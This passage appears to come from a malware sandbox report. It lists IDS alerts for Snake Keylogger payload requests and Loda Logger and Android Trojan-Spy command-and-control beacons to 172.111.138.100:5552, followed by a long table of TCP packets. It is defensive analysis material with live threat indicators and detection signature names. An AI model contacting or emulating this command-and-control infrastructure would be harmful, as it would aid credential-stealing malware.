2024-12-30T11:41:35.431094+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49845	172.111.138.100	5552	TCP
2024-12-30T11:41:36.092894+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49838	172.217.18.110	443	TCP
2024-12-30T11:41:36.194034+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49836	172.217.18.110	443	TCP
2024-12-30T11:41:44.469306+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49945	172.111.138.100	5552	TCP
2024-12-30T11:41:53.742169+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50009	172.111.138.100	5552	TCP
2024-12-30T11:42:02.837780+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.7	50069	172.111.138.100	5552	TCP
2024-12-30T11:42:02.837780+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50069	172.111.138.100	5552	TCP
2024-12-30T11:42:11.886295+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50096	172.111.138.100	5552	TCP
2024-12-30T11:42:45.670947+0100	2830912	ETPRO MALWARE Loda Logger CnC Beacon Response M2	1	172.111.138.100	5552	192.168.2.7	50096	TCP
2024-12-30T11:43:18.226252+0100	2830912	ETPRO MALWARE Loda Logger CnC Beacon Response M2	1	172.111.138.100	5552	192.168.2.7	50096	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:41:23.432127953 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.432163954 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:23.432223082 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.432271004 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.432276011 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:23.433195114 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.541753054 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.541776896 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:23.542010069 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:23.542030096 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.151060104 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.151863098 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.159332991 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.159713030 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.161529064 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.162326097 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.171323061 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.179981947 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.511820078 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:24.515341997 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.515356064 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.515666962 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.516397953 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.516398907 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.516428947 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.516649008 CET	80	49714	69.42.215.252	192.168.2.7
Dec 30, 2024 11:41:24.516705036 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.517823935 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:24.517894030 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.518894911 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.519059896 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:24.519243002 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.523854017 CET	80	49714	69.42.215.252	192.168.2.7
Dec 30, 2024 11:41:24.559323072 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.559324026 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.811733007 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.811784983 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.811796904 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.812062025 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.812589884 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.812628984 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.812629938 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.812654972 CET	443	49707	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.812808990 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.812824011 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.812843084 CET	49707	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.813476086 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.813499928 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.813602924 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.813857079 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.814639091 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.814651966 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.814932108 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.814949036 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.815027952 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.815107107 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.815107107 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.815337896 CET	49706	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.815344095 CET	443	49706	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.816493034 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.816512108 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.816803932 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.817353010 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:24.817365885 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:24.823657990 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.823689938 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.823699951 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:24.823719025 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:24.823776960 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.824029922 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.824042082 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:24.824084044 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.824347973 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:24.824359894 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.097453117 CET	80	49714	69.42.215.252	192.168.2.7
Dec 30, 2024 11:41:25.102135897 CET	49714	80	192.168.2.7	69.42.215.252
Dec 30, 2024 11:41:25.425831079 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.429374933 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.429985046 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.429992914 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.432455063 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.432461023 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.432606936 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.432723045 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.433028936 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.433034897 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.435333967 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.435345888 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.440005064 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.448725939 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.449353933 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.449472904 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.449861050 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.461848021 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.461880922 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.462496042 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.463280916 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.463654995 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.465058088 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.465085030 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.465826035 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.466042995 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.466384888 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.507330894 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.507332087 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.802649021 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.804233074 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.804347038 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.806699038 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.807288885 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.807917118 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.819328070 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.819885015 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.823959112 CET	49716	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.823972940 CET	443	49716	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.824515104 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.824538946 CET	443	49717	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.824551105 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.824551105 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.824599028 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.824624062 CET	49717	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825145960 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825145960 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825176954 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.825393915 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825406075 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.825623035 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825804949 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:25.825818062 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:25.984740019 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.984798908 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.984908104 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.984965086 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.985219002 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.986589909 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.986663103 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.986686945 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.986730099 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.986754894 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.986783028 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.986841917 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.992762089 CET	49718	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.992763996 CET	49719	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:25.992780924 CET	443	49718	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:25.992794037 CET	443	49719	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.104928017 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.104962111 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.105005026 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.105032921 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.105071068 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.105420113 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.107714891 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.107732058 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.107883930 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.107894897 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.410806894 CET	49737	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:26.415657997 CET	5552	49737	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:26.415769100 CET	49737	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:26.416068077 CET	49737	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:26.420799971 CET	5552	49737	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:26.422693014 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.422775984 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.424504995 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.424654007 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.424666882 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.425599098 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.426145077 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.426148891 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.426853895 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.426860094 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.427993059 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.427999020 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.706871986 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.708492041 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.711153984 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.711163998 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.711323977 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.711328983 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.741005898 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.741228104 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.742577076 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.742583036 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.742737055 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:26.742758036 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:26.795463085 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.795830011 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.796144009 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.797327042 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.803328037 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.803332090 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:26.811228037 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.811228037 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.996747017 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:26.996815920 CET	443	49727	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.004683018 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.012969017 CET	49727	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.062887907 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.062927008 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.063014030 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.066625118 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.066637993 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.066776037 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.066776037 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.066812038 CET	443	49728	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.070476055 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.070518970 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.073497057 CET	49728	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.073530912 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.075489044 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.075516939 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.115142107 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.115190983 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.115299940 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.121814013 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.126012087 CET	49735	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.126039982 CET	443	49735	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.127844095 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.127891064 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.132544994 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.133363008 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.133383989 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271044970 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271125078 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.271161079 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271192074 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271208048 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.271233082 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.271365881 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271414042 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.271450996 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.271496058 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.271578074 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.272094965 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.272115946 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.272537947 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.272603035 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.272744894 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.274422884 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.274452925 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.483331919 CET	443	49736	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.483400106 CET	49736	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.675263882 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.675331116 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.675709009 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.675719976 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.685309887 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.685322046 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.693605900 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.697551012 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.697910070 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.697916031 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.699848890 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:27.699856997 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:27.739659071 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.755335093 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.768224955 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.768234015 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.769814014 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.769818068 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.873552084 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.874306917 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.881047964 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.881057978 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:27.881213903 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:27.881220102 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.053829908 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.053960085 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.056281090 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.061256886 CET	49745	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.061280966 CET	443	49745	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.061820030 CET	49757	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.061867952 CET	443	49757	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.061944962 CET	49757	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.062167883 CET	49757	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.062181950 CET	443	49757	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.076730013 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.077609062 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.083332062 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.084247112 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.084247112 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.084475994 CET	49744	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.084490061 CET	443	49744	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.084985971 CET	49758	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.085063934 CET	443	49758	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.088000059 CET	49758	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.089457035 CET	49758	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.089483976 CET	443	49758	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.149743080 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.149795055 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.149898052 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.149908066 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.150239944 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.150805950 CET	49746	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.150823116 CET	443	49746	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.151328087 CET	49763	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.151357889 CET	443	49763	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.151606083 CET	49763	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.151843071 CET	49763	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.151850939 CET	443	49763	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.307327032 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.307365894 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.307463884 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.310379982 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.311822891 CET	49749	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.311839104 CET	443	49749	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.312237024 CET	49766	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.312311888 CET	443	49766	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.313858986 CET	49766	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.314131975 CET	49766	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.314167023 CET	443	49766	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:28.533957005 CET	49757	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.533989906 CET	49758	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.534006119 CET	49763	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.534022093 CET	49766	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:28.839385986 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.839425087 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.839560032 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.839608908 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.842777967 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.842876911 CET	49768	443	192.168.2.7	172.217.18.110
